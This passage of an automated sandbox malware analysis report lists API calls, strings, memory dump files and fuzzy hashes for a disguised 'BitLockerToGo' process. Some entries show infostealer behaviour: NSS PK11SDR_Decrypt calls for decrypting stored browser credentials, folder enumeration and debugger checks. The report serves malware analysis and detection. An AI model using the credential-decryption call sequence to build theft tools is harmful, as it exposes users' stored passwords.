                                                                                                                                                                • Instruction Fuzzy Hash: 9BB32B71E0021ACFCB14CFA9C894A9DB7B2FF49304F1981A9D559AB745E730AD86CF90
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE7B8), ref: 6CC8FF81
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE7B8), ref: 6CC9022D
                                                                                                                                                                • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CC90240
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE768), ref: 6CC9025B
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE768), ref: 6CC9027B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                                • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                • API String ID: 618468079-3566792288
                                                                                                                                                                • Opcode ID: bf6f1d582b09be672bc287082aa17ddb637eee461b768a84e3f9522710cc854d
                                                                                                                                                                • Instruction ID: 4f86ed36641f5b404a6618d4af85cc6104dad6f3017a3906b4c1f296bb840ce4
                                                                                                                                                                • Opcode Fuzzy Hash: bf6f1d582b09be672bc287082aa17ddb637eee461b768a84e3f9522710cc854d
                                                                                                                                                                • Instruction Fuzzy Hash: F9B2CF716057418FD714CF2DC591716BBE1BF89328F28C6ACE8AA8BB95E770E841CB41
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 0300ED3E
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0300ED55
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03021538), ref: 0300EDAB
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0302153C), ref: 0300EDC1
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0300F2AE
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 0300F2C3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                • String ID: %s\*.*
                                                                                                                                                                • API String ID: 180737720-1013718255
                                                                                                                                                                • Opcode ID: 5829e67df4b3924a13a966775d5c073d8b511469a8acb7d353fa6dcb05bb6893
                                                                                                                                                                • Instruction ID: 87643f0e0c6d957f6fd4fc353fdaadc99748b959731f8c6301b67035642e5919
                                                                                                                                                                • Opcode Fuzzy Hash: 5829e67df4b3924a13a966775d5c073d8b511469a8acb7d353fa6dcb05bb6893
                                                                                                                                                                • Instruction Fuzzy Hash: 8EE10276A132189BEB55FB60DD50EEE733CAF94210F4045D9B40A6A091EF706F9ACF50
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D4F2
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D50B
                                                                                                                                                                  • Part of subcall function 6CC7CFE0: EnterCriticalSection.KERNEL32(6CCFE784), ref: 6CC7CFF6
                                                                                                                                                                  • Part of subcall function 6CC7CFE0: LeaveCriticalSection.KERNEL32(6CCFE784), ref: 6CC7D026
                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D52E
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE7DC), ref: 6CC9D690
                                                                                                                                                                • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC9D6A6
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE7DC), ref: 6CC9D712
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D751
                                                                                                                                                                • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC9D7EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                • API String ID: 2690322072-3894294050
                                                                                                                                                                • Opcode ID: 85be8f96ee263245b8d38b65906e858e5da498f3d753a60d734967c03d410330
                                                                                                                                                                • Instruction ID: 0287df21e281e245434b9980197bda2536af2644375fdbd6ffaf477de9ee9aaa
                                                                                                                                                                • Opcode Fuzzy Hash: 85be8f96ee263245b8d38b65906e858e5da498f3d753a60d734967c03d410330
                                                                                                                                                                • Instruction Fuzzy Hash: 2491AE71A047418FD754CF29C49066AB7F2FF89318F14892EE5AAD7A85E730E845CB82
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC95EDB
                                                                                                                                                                • memset.VCRUNTIME140(6CCD7765,000000E5,55CCCCCC), ref: 6CC95F27
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CC95FB2
                                                                                                                                                                • memset.VCRUNTIME140(6CCD7765,000000E5,CFC09015), ref: 6CC961F0
                                                                                                                                                                • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6CC97652
                                                                                                                                                                Strings
                                                                                                                                                                • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CC972E3
                                                                                                                                                                • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CC972F8
                                                                                                                                                                • MOZ_CRASH(), xrefs: 6CC97BA4
                                                                                                                                                                • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CC9730D
                                                                                                                                                                • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CC97BCD, 6CC97C1F, 6CC97C34, 6CC980FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                                                                                                                • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                • API String ID: 2613674957-1127040744
                                                                                                                                                                • Opcode ID: 043dac2633d9d17f9cda53bffeb84bc3f4d28400056a67d8e8eed21ed03c9ef2
                                                                                                                                                                • Instruction ID: e426a5658353ebdeb4af2f4077723aa415c4d3cfd8a9c2701aef5d279a2eaad8
                                                                                                                                                                • Opcode Fuzzy Hash: 043dac2633d9d17f9cda53bffeb84bc3f4d28400056a67d8e8eed21ed03c9ef2
                                                                                                                                                                • Instruction Fuzzy Hash: D2335D71606B018FD704CF29C590715BBE2BF85328F29C6ADE56A8B7E5E731E841CB81
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0300C853
                                                                                                                                                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,03554E90), ref: 0300C871
                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0300C87C
                                                                                                                                                                • PK11_GetInternalKeySlot.NSS3 ref: 0300C88A
                                                                                                                                                                • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0300C8A5
                                                                                                                                                                • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0300C8EB
                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0300C912
                                                                                                                                                                • lstrcat.KERNEL32(?,03020B46), ref: 0300C943
                                                                                                                                                                • lstrcat.KERNEL32(?,03020B47), ref: 0300C957
                                                                                                                                                                • PK11_FreeSlot.NSS3(?), ref: 0300C961
                                                                                                                                                                • lstrcat.KERNEL32(?,03020B4E), ref: 0300C978
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3428224297-0
                                                                                                                                                                • Opcode ID: 862e1acf6e3f9cf85f72628cc3602934ee6a6efcdb1147f8d379ed7b65d699f6
                                                                                                                                                                • Instruction ID: beb389d4308a2aeb168bf5964da5c33b7c4f992ac8f3f8354973dcbc631269ab
                                                                                                                                                                • Opcode Fuzzy Hash: 862e1acf6e3f9cf85f72628cc3602934ee6a6efcdb1147f8d379ed7b65d699f6
                                                                                                                                                                • Instruction Fuzzy Hash: BC41627894521ADFEB10DFA4DD8CBEEB7B8BB44304F0042A8F509A6284D7745A84CF91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,03020C2E), ref: 0300DE5E
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030214C8), ref: 0300DEAE
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030214CC), ref: 0300DEC4
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0300E3E0
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 0300E3F2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                • API String ID: 2325840235-1173974218
                                                                                                                                                                • Opcode ID: ec328dbffc8edab5023f3c53d9c39f60fc92790744c4debdcfb8ccd9ed39dc06
                                                                                                                                                                • Instruction ID: fad2947b4c8b345d0a091182fef0599d8142aaf5e68966c2fe2a58db1f2416ac
                                                                                                                                                                • Opcode Fuzzy Hash: ec328dbffc8edab5023f3c53d9c39f60fc92790744c4debdcfb8ccd9ed39dc06
                                                                                                                                                                • Instruction Fuzzy Hash: 84F1D8759132189BDB19FB60DD94EEE7338BF54310F8041DAA41A6A090EF706F9ACF60
                                                                                                                                                                APIs
                                                                                                                                                                • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CCC2C31
                                                                                                                                                                • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CCC2C61
                                                                                                                                                                  • Part of subcall function 6CC74DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC74E5A
                                                                                                                                                                  • Part of subcall function 6CC74DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC74E97
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCC2C82
                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCC2E2D
                                                                                                                                                                  • Part of subcall function 6CC881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC881DE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                • API String ID: 801438305-4149320968
                                                                                                                                                                • Opcode ID: abca9fe1424e6cdfa30422db332c1f413886538537c28fe9b6b690c682f72ad3
                                                                                                                                                                • Instruction ID: ac0dba2422e15f74908f8a9e035f1b492cfa1d36aec37912a761cea50567d944
                                                                                                                                                                • Opcode Fuzzy Hash: abca9fe1424e6cdfa30422db332c1f413886538537c28fe9b6b690c682f72ad3
                                                                                                                                                                • Instruction Fuzzy Hash: 3291CC706087408FD724CF28D4A469EB7F1AF8A358F14491DE59A8B790EB30D94ACB53
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                • API String ID: 0-3654031807
                                                                                                                                                                • Opcode ID: 58f3f354554180b9f110cd1239fee3644aa212c44ef04af0e7d4a39040008cde
                                                                                                                                                                • Instruction ID: d60c7dc7283a4fd64e28193427a0c4864d8542680d0bc235110b516475bdfc80
                                                                                                                                                                • Opcode Fuzzy Hash: 58f3f354554180b9f110cd1239fee3644aa212c44ef04af0e7d4a39040008cde
                                                                                                                                                                • Instruction Fuzzy Hash: E262AB7160C3858FD721CF29C09075ABBF2FF86358F184A4DE4E54BA91E3359885CBA2
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __aulldiv$__aullrem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2022606265-0
                                                                                                                                                                • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                                • Instruction ID: 3fe6fe184255ad6b5af7d305bd2a9d086672a86f6f026cddffdd5468aa6ae7e9
                                                                                                                                                                • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                                • Instruction Fuzzy Hash: 2F320332B146128FC728DE2CC890656BBE6EFC9350F09866DE895CB395E734ED05CB91
                                                                                                                                                                APIs
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0301BBA2
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0301BBB7
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0301F2A8), ref: 0301BBC2
                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0301BBDE
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0301BBE5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
